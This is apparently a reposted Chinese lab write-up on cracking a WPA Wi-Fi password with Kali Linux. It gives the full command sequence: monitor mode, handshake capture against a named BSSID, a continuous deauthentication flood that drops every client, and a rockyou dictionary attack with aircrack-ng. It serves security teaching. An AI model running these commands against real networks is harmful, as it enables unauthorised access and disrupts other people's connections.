信息安全—WIFI攻击实验

信息安全—WIFI攻击实验

过程视频详见 WIFI攻击视频

实验器材

1.kali linux 操作系统
2.VM 虚拟机
3.无线网卡
4.字典(kali自带字典)

详细设计

(1)实验设计
在这里插入图片描述

实验步骤与分析结果

1)Wi-Fi破解前期准备
①检查无线网卡的状态
使用命令“airmon-ng” ,检查无线网卡是否接入虚拟机

图1.检查无线网卡是否接入虚拟机
使用命令“iwconfig”,如图2查看无线网卡模式

图2.查看无线网卡模式

②开启监控模式
使用命令“airmon-ng start wlan0”将网卡转为监听模式(命令后空格数字,数字表示监听的信道),见图3。

图3.开启监控模式
c.查看网卡模式
使用命令“iwconfig”,将系统配置无线网络设备或显示无线网络设备信息,如图4所示无线网卡监听模式启动成功mode值会变为monitor(监听模式)。

图4.查看网卡模式
④ 扫描周围Wi-Fi
使用命令“airodump-ng wlan0mon”扫描附近的无线网络(ctrl+c停止)

图5. 扫描周围Wi-Fi
其中显示的每一项含义见表1:
在这里插入图片描述

2)WPA加密攻击过程
① 获取网络状态信息
如图6所示使用命令“airodump-ng -c 1 --bssid F6:B7:B3:90:F1:28 -w~/Desktop/Wi-Fi/test.cap wlan0mon”,进行抓包。

图6. 获取网络状态信息
其中显示的每一项含义见表2:
在这里插入图片描述

② 进行洪水攻击
使用命令“aireplay-ng -0 0 -a F6:B7:B3:90:F1:28 wlan0mon”进行洪水攻击,保持上面的窗口不要关闭,重新开一个窗口键入此命令。如图7,让当前路由下的所有连接断开。(0 表示不断攻击)

图7.进行洪水攻击
c. 跑包
使用命令“cd /usr/share/wordlists/ ”,进入特定的目录;
使用命令“ls”,默认显示的只有非隐藏文件的文件名、以文件名进行排序及文件名代表的颜色显示。当不加参数时,默认列出当前目录的列表信息。
使用命令“gzip –d rockyou.txt.gz”解压里面的rockyou.txt.gz
使用命令“ls”,找到rockyou.txt
具体流程见图8。

图8.跑包
④ 开始攻击
使用命令“aircrack-ng -w /usr/share/wordlists/rockyou.txt test.cap-01.cap”进行攻击,其中“aircrack-ng -w”代表字典包位置,抓包生成的文件名.cap(跑字典解密),见图9。

图9.开始攻击

⑤ 运行结果
已成功破解wifi密码
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_44725217/article/details/106456127